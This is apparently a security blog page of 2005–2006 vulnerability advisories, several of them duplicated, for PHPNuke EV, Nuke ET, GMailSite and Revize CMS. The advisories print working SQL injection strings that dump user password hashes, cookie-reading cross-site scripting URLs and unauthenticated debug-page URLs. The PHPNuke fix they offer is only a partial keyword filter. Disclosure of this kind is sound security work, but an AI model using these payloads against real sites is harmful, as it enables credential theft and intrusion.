###############################################
PHPNuke EV 7.7 'search' module 'query' variable SQL injection
Vendor url: http://nukevolution.com/
exploit available:yes vendor notify:yes
advisore:http://lostmon.blogspot.com/2006/01/
phpnuke-ev-77-search-module-query.html
OSVDB ID:22316Related OSVDB:21002and:20866
BID:16186
Secunia:SA18394Related Secunia:SA17638 andSA17543
################################################
PHPNuke EV 7.7 have a flaw which can be exploited by malicious
people to conduct SQL injection attacks.
Input passed to the "query" parameter when performing a search isn't
properly sanitised before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.
#################
versions:
################
PHPNuke EV 7.7 -R1
posible prior versions are afected.
##################
solution:
###################
No solution at this time!!!
A posible fix:
Open file modules/Search/index.php and after this code:
------------------------------------
require_once("mainfile.php");
$instory = '';
$module_name = basename(dirname(__FILE__));
get_lang($module_name);
----------------------------------------------
you can add this other :
------------------------------------
if(eregi("UNION SELECT",$query) || eregi("UNION%20SELECT",$query)){
die();
}
----------------------------------------------
this is a "simple fix " only detect UNION SELECT comand and die
if this is in the query variable... you can write the same code
for UNION ALL SELECT or other varians of xploit
####################
Timeline
####################
discovered:21-11-2005
vendor notify:29-12-2005 (forums)
vendor response:-------
vendor fix:-----
disclosure:09-01-2006
###################
example:
###################
go to
http://[Victim]/modules.php?name=Search
and write in the search box this proof
s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*
all users hashes are available to view..
#################### €nd ########################
Thnx to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
GMailSite variable Cross-Site Scripting and script injection
Thursday, December 29, 2005
#######################################################
GMailSite variable Cross-Site Scripting and script injection
Vendor Url:http://www.gmailsite.com/
vendor specific entry:http://foros.ojobuscador.com/tema1936.html
Advisore:http://lostmon.blogspot.com/2005/12/
gmailsite-variable-cross-site.html
vendor notify:yes Exploit available:yes
OSVDB ID:22083,22095
Secunia:SA18155
BID:16081
########################################################
GMailSite is script that allows that you use your
account of mail of GMail to create a page in which
all the attached archives of your messages will be
published that esten kept under some label in your
account from mail.
GMailSite contains a flaw that allows a remote
Cross-Site Scripting attack.This flaw exists because
the application does not validate 'lng' variable upon
submission to index.php script.This could allow a user
to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust
relationship between the browser and the server,
leading to a loss of integrity.
Wen we "inject" the html or javascript code in the 'lng'
variable , this code is write in the coockie and it is
execute every time wen we click on a link in the GMailSite
for stop this code only need to click in other language.
This Flaw Is a posible script insercion,and a posible
local file inclusion.
#################
versions afected
#################
GMailSite
GmailSite 1.0.4 -
GmailSite 1.0.3 -
GmailSite 1.0.2 -
GmailSite 1.0.1 -
GmailSite 1.0 -
GFHost
GFHost 0.4.2
GFHost 0.4.1
GFHost 0.4
GFHost 0.3
GFHost 0.2
GFHost 0.1.1
#################
Solution
#################
No solution at this time !!!
#############
Timeline
#############
Discovered: 13-11-2005
Vendor notify: 28-12-2005
Vendor response:28-12-2005
Disclosure:29-12-2005
##################
Example
##################
http://[VICTIM]/?lng=es"><script>alert(document.cookie)</script>
http://[VICTIM]/index.php?lng=es"><script>alert(document.cookie)</script>
##################### €nd ###############
Thnx to estrella to be my ligth
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
GMailSite variable Cross-Site Scripting and script injection
Vendor Url:http://www.gmailsite.com/
vendor specific entry:http://foros.ojobuscador.com/tema1936.html
Advisore:http://lostmon.blogspot.com/2005/12/
gmailsite-variable-cross-site.html
vendor notify:yes Exploit available:yes
OSVDB ID:22083,22095
Secunia:SA18155
BID:16081
########################################################
GMailSite is script that allows that you use your
account of mail of GMail to create a page in which
all the attached archives of your messages will be
published that esten kept under some label in your
account from mail.
GMailSite contains a flaw that allows a remote
Cross-Site Scripting attack.This flaw exists because
the application does not validate 'lng' variable upon
submission to index.php script.This could allow a user
to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust
relationship between the browser and the server,
leading to a loss of integrity.
Wen we "inject" the html or javascript code in the 'lng'
variable , this code is write in the coockie and it is
execute every time wen we click on a link in the GMailSite
for stop this code only need to click in other language.
This Flaw Is a posible script insercion,and a posible
local file inclusion.
#################
versions afected
#################
GMailSite
GmailSite 1.0.4 -
GmailSite 1.0.3 -
GmailSite 1.0.2 -
GmailSite 1.0.1 -
GmailSite 1.0 -
GFHost
GFHost 0.4.2
GFHost 0.4.1
GFHost 0.4
GFHost 0.3
GFHost 0.2
GFHost 0.1.1
#################
Solution
#################
No solution at this time !!!
#############
Timeline
#############
Discovered: 13-11-2005
Vendor notify: 28-12-2005
Vendor response:28-12-2005
Disclosure:29-12-2005
##################
Example
##################
http://[VICTIM]/?lng=es"><script>alert(document.cookie)</script>
http://[VICTIM]/index.php?lng=es"><script>alert(document.cookie)</script>
##################### €nd ###############
Thnx to estrella to be my ligth
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
Nuke ET 'search' module 'query' variable SQL injection
Monday, November 21, 2005
###############################################
Nuke ET 'search' module 'query' variable SQL injection
Vendor url: www.truzone.org
exploit available:yes vendor notify:yes
advisore:http://lostmon.blogspot.com/2005/11/
nuke-et-search-module-query-variable.html
OSVDB ID:21002
Secunia:SA17638
BID:15519
################################################
Nuke ET have a flaw which can be exploited by malicious people to
conduct SQL injection attacks.
Input passed to the "query" parameter when performing a search isn't
properly sanitised before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.
#################
versions:
################
Nuke ET 3.2
posible prior versions are afected.
##################
solution:
###################
the vendor has release a fix
http://www.truzone.org/modules.php?name=
DescNuke&d_op=getit&lid=1557
aply the fix as fast posible
####################
Timeline
####################
discovered:21-11-2005
vendor notify:21-11-2005
vendor response:21-11-2005
vendor fix:21.11.2005
disclosure:21-11-2005
###################
example:
###################
go to
http://[Victim]/modules.php?name=Search
and write in the search box this proof
s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*
all users hashes are available to view..
#################### €nd ########################
Thnx to estrella to be my ligth
Thnx to Truzone
Thnx to RiXi
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
Nuke ET 'search' module 'query' variable SQL injection
Vendor url: www.truzone.org
exploit available:yes vendor notify:yes
advisore:http://lostmon.blogspot.com/2005/11/
nuke-et-search-module-query-variable.html
OSVDB ID:21002
Secunia:SA17638
BID:15519
################################################
Nuke ET have a flaw which can be exploited by malicious people to
conduct SQL injection attacks.
Input passed to the "query" parameter when performing a search isn't
properly sanitised before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.
#################
versions:
################
Nuke ET 3.2
posible prior versions are afected.
##################
solution:
###################
the vendor has release a fix
http://www.truzone.org/modules.php?name=
DescNuke&d_op=getit&lid=1557
aply the fix as fast posible
####################
Timeline
####################
discovered:21-11-2005
vendor notify:21-11-2005
vendor response:21-11-2005
vendor fix:21.11.2005
disclosure:21-11-2005
###################
example:
###################
go to
http://[Victim]/modules.php?name=Search
and write in the search box this proof
s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*
all users hashes are available to view..
#################### €nd ########################
Thnx to estrella to be my ligth
Thnx to Truzone
Thnx to RiXi
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
Revize(r) CMS SQL information disclosure and XSS
Wednesday, November 16, 2005
#######################################################
Revize(r) CMS SQL information disclosure and XSS
Vendor url:http://www.idetix.com
Advisore:http://lostmon.blogspot.com/2005/11/
revizer-cms-sql-information-disclosure.html
Vendor notify: exploit available:yes
OSVDB ID: 20918,20919,20920,20921,20922
Securitytracker:1015231
Secunia:SA17623
BID:15481,15482,15484
#######################################################
The Revize(r) Web Content Management System enables
non-technical content contributors to quickly and easily
keep their Web Pages up-to-date. Revize can be applied
to a sophisticated, mature site or to the development of
a new Web Site from the ground up. And Revize is powerful
enough to manage Web content for any large organization.
Or, Revize can be localized into one or more departments.
The Input passed to the "query" parameter in "query_results.jsp"
isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code.
This may allow a remote attacker execute or manipulate SQL
queries in the backend database.
a remote user can obtain sensitive data , about the target
system if the attacker request directly ' revize.xml '
located in ' conf ' directory...the normal url for this flaw is:
http://[victim]/revize/conf/
#################
version
#################
unknow version of Revize(r) CMS
##################
solution
##################
No solution at this time.
###################
Timeline
###################
Discovered: 02-11-2005
vendor notify:14-11-2005
vendor response:
disclosure:16-11-2005
#######################
examples
#######################
SQL command:
http://[Victim]/revize/debug/query_results.jsp?
webspace=REVIZE&query=select%20*%20from%20pbpublic.rSubjects
http://[Victim]/revize/debug/query_results.jsp?query=
select%20*%20from%20pbpublic.rSubjects
http://[Victim]/revize/debug/query_input.jsp?
table=rSubjects&apptable&webspace=REVIZE
¿Admin Bypass ?
http://[Victim]/revize/debug/
wen we are in this url , the page have a login form for
accessing, but if we click in any link we can obtain some
relevant information about the site and we don´t need a login.
http://[Victim]/revize/debug/apptables.html
http://[Victim]/revize/debug/main.html
#####################
cross site scripting
#####################
http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/
admincenter/setWebSpace.jsp&action=login&resourcetype=%22%3E%3
Cscript%3Ealert(document.cookie)%3C/script%3Esecurity&objectmap
=subject&error=admincenter/login.jsp
http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/
admincenter/setWebSpace.jsp&action=login&resourcetype=security
&objectmap=subject%22%3E%3Cscript%3Ealert(document.cookie)%3C/
script%3E&error=admincenter/login.jsp
http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/
admincenter/setWebSpace.jsp%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E&action=login&resourcetype=security&objectmap
=subject&error=admincenter/login.jsp
################### €nd ############################
thnx to estrella to be my ligth
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
Revize(r) CMS SQL information disclosure and XSS
Vendor url:http://www.idetix.com
Advisore:http://lostmon.blogspot.com/2005/11/
revizer-cms-sql-information-disclosure.html
Vendor notify: exploit available:yes
OSVDB ID: 20918,20919,20920,20921,20922
Securitytracker:1015231
Secunia:SA17623
BID:15481,15482,15484
#######################################################
The Revize(r) Web Content Management System enables
non-technical content contributors to quickly and easily
keep their Web Pages up-to-date. Revize can be applied
to a sophisticated, mature site or to the development of
a new Web Site from the ground up. And Revize is powerful
enough to manage Web content for any large organization.
Or, Revize can be localized into one or more departments.
The Input passed to the "query" parameter in "query_results.jsp"
isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code.
This may allow a remote attacker execute or manipulate SQL
queries in the backend database.
a remote user can obtain sensitive data , about the target
system if the attacker request directly ' revize.xml '
located in ' conf ' directory...the normal url for this flaw is:
http://[victim]/revize/conf/
#################
version
#################
unknow version of Revize(r) CMS
##################
solution
##################
No solution at this time.
###################
Timeline
###################
Discovered: 02-11-2005
vendor notify:14-11-2005
vendor response:
disclosure:16-11-2005
#######################
examples
#######################
SQL command:
http://[Victim]/revize/debug/query_results.jsp?
webspace=REVIZE&query=select%20*%20from%20pbpublic.rSubjects
http://[Victim]/revize/debug/query_results.jsp?query=
select%20*%20from%20pbpublic.rSubjects
http://[Victim]/revize/debug/query_input.jsp?
table=rSubjects&apptable&webspace=REVIZE
¿Admin Bypass ?
http://[Victim]/revize/debug/
wen we are in this url , the page have a login form for
accessing, but if we click in any link we can obtain some
relevant information about the site and we don´t need a login.
http://[Victim]/revize/debug/apptables.html
http://[Victim]/revize/debug/main.html
#####################
cross site scripting
#####################
http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/
admincenter/setWebSpace.jsp&action=login&resourcetype=%22%3E%3
Cscript%3Ealert(document.cookie)%3C/script%3Esecurity&objectmap
=subject&error=admincenter/login.jsp
http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/
admincenter/setWebSpace.jsp&action=login&resourcetype=security
&objectmap=subject%22%3E%3Cscript%3Ealert(document.cookie)%3C/
script%3E&error=admincenter/login.jsp
http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/
admincenter/setWebSpace.jsp%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E&action=login&resourcetype=security&objectmap
=subject&error=admincenter/login.jsp
################### €nd ############################
thnx to estrella to be my ligth
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
Subscribe to:
Posts (Atom)